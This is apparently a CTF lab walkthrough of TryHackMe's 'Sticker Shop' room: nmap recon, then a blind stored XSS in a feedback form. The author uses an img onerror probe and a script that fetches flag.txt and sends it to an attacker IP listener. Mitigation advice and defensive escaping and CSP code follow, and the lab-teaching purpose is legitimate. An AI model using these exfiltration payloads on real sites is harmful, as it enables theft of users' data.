
The Sticker Shop

https://tryhackme.com/room/thestickershop


Last updated 3 months ago


Task 1 - Deploy the machine

🎯 Target IP: 10.10.73.89

Create a directory for the machine on the Desktop, with a subdirectory to hold the nmap scans.

Task 2 - Reconnaissance

su
echo "10.10.73.89 tss.thm" >> /etc/hosts

mkdir -p thm/tss.thm
cd thm/tss.thm
mkdir {nmap,content,exploits,scripts}

# At the end of the room:
# remove the last line (the tss.thm entry) from /etc/hosts
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target: this checks connectivity and gives a first hint about the OS.

ping -c 3 tss.thm
PING tss.thm (10.10.73.89) 56(84) bytes of data.
64 bytes from tss.thm (10.10.73.89): icmp_seq=1 ttl=63 time=65.0 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=2 ttl=63 time=61.9 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=3 ttl=63 time=62.3 ms

From these three ICMP replies we see that the Time To Live (TTL) is ~64 (63 after one hop; the TTL is a hop count, not a time). This indicates that the target is a *nix system, while Windows systems usually have a TTL of 128.

This room does not provide a path or intermediate answers; it asks us directly for the flag.

Let's try to grab it right away with curl: curl -i http://tss.thm:8080/flag.txt

2 of spades! :D

No worries. Let's start gathering information by scanning for open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 tss.thm -oG nmap/port_scan
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63
Useful nmap options (command → result):
  • sudo: run as root
  • -sC: run default scripts
  • -sV: enumerate versions
  • -A: aggressive mode
  • -T4: run a bit faster
  • -oN: output to file with nmap formatting

It looks like there are 2 open ports on the machine: 22 and 8080.

Now we need to identify which services are running on the open ports:

nmap -p22,8080 -n -Pn -vvv -sCV --min-rate 5000 tss.thm -oN nmap/open_port
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
|   256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
|   256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open  http    syn-ack ttl 63 Werkzeug httpd 3.0.1 (Python 3.8.10)
|_http-title: Cat Sticker Shop
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web server is listening on port 8080 instead of 80; let's go there!

Task 3 - Find the flag.txt

Let's enumerate the website with a command-line tool: whatweb "http://tss.thm:8080"

This only confirms what we already knew from the nmap scan: Werkzeug 3.0.1 on Python 3.8.10. We'll look into whether this version is vulnerable later.

Now let's open the browser to view the web page (port 8080):

Here there are only two products (sticker images) that we can see.

We also check the page source for information disclosure, but find nothing useful.

In the meantime I ran a directory enumeration scan with gobuster, which unfortunately returned no results.

gobuster dir -u http://tss.thm:8080 -w /usr/share/wordlists/dirb/common.txt

Let's move to the second page: "Feedback":

Very good: a textarea where we can write and submit feedback. This could be an injection point.

Testing the standard XSS payload <script>alert("XSS")</script>, we get no errors, but nothing is reflected either:

Let's analyze this better by capturing the HTTP request with our dear Burp Suite proxy.

We can see that it is a POST request; the Accept header shows the content types the browser will accept in the response:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng

Since the XSS appears to be blind (the input is stored and rendered somewhere we cannot see), let's check whether whoever views the feedback can reach our attacker machine, using the JavaScript fetch method.

Retrieve our attacker machine IP (10.21.31.235).

Go into listening mode with netcat on port 1339: nc -lvnp 1339

Then submit this payload, either from the Burp Suite Repeater or directly in the textarea:

<img src=x onerror="fetch('http://10.21.31.235:1339')"/>

We receive the callback: fantastic! Whoever views the feedback has a browser that executes our injected HTML.

Based on this, and remembering that the flag is at /flag.txt, we prepare a payload that makes the viewer's browser fetch the flag and send it back to us in the request:

<script>
fetch('http://tss.thm:8080/flag.txt') // Requests the flag file from the target server
  .then(response => response.text()) // Reads the response as text
  .then(data => {
    fetch('http://10.21.31.235:1339/?data=' + encodeURIComponent(data)) // Sends stolen data to attacker's machine
  })
</script>

Flag found!

Possible Mitigations
  • Content Security Policy (CSP): block inline scripts and limit the allowed domains for fetch requests (connect-src).

  • Proper XSS filtering: escape or sanitize user input before rendering it, so that stored feedback cannot inject markup or scripts.

  • Same-Origin Policy enforcement: ensure sensitive files like flag.txt are not accessible from untrusted origins. Note that a script injected into the shop's own origin is not stopped by SOP, so the file itself also needs proper authorization.

  • HttpOnly & Secure cookies: prevent session hijacking through XSS attacks.
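As an added example (not code from the room or from this writeup), the following Python module shows the two server-side fixes above: a vulnerable feedback renderer beside an escaped one, and a simplified CSP check that explains why a connect-src 'self' policy would block the fetch to the attacker host while still allowing same-origin requests. The hardened policy, the origin and the sample feedback are assumptions constructed for the demo; the CSP evaluator only models 'self', 'none', '*' and host sources.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: the blind-XSS probe from the walkthrough, as stored feedback.
SAMPLE_FEEDBACK = "<img src=x onerror=\"fetch('http://10.21.31.235:1339')\"/>"
SHOP_ORIGIN = "http://tss.thm:8080"
# Hypothetical hardened policy for the shop (an assumption, not the room's configuration).
HARDENED_CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self'"


def render_feedback_vulnerable(feedback):
    """Interpolates raw input into HTML: the stored-XSS pattern the room relies on."""
    return f"<div class='feedback'>{feedback}</div>"


def render_feedback_safe(feedback):
    """Escapes the input and returns the body plus the CSP header to send with it."""
    body = f"<div class='feedback'>{html.escape(feedback, quote=True)}</div>"
    return body, {"Content-Security-Policy": HARDENED_CSP}


def parse_csp(policy):
    """Split a CSP header value into {directive: [source expressions]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def csp_allows(policy, directive, target_url, page_origin):
    """Simplified fetch-directive check: 'self', 'none', '*' and host sources only.
    Falls back to default-src; allows everything when neither directive is present."""
    parsed = parse_csp(policy)
    sources = parsed.get(directive, parsed.get("default-src"))
    if sources is None:
        return True
    if "'none'" in sources:
        return False
    target = urlsplit(target_url)
    for src in sources:
        if src == "*":
            return True
        if src == "'self'" and f"{target.scheme}://{target.netloc}" == page_origin:
            return True
        if not src.startswith("'"):  # explicit host source such as https://cdn.example
            host = urlsplit(src if "://" in src else f"{target.scheme}://{src}").netloc
            if host == target.netloc:
                return True
    return False


def inline_scripts_allowed(policy):
    """True unless script-src (or default-src) exists without 'unsafe-inline'; nonces/hashes ignored."""
    parsed = parse_csp(policy)
    sources = parsed.get("script-src", parsed.get("default-src"))
    return sources is None or "'unsafe-inline'" in sources
```

With the hardened policy the inline onerror handler is not permitted and the exfiltration fetch to 10.21.31.235:1339 fails the connect-src check, while the same-origin request to /flag.txt would still be allowed, which is why the file also needs its own access control.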

🚩 Flag (flag.txt)
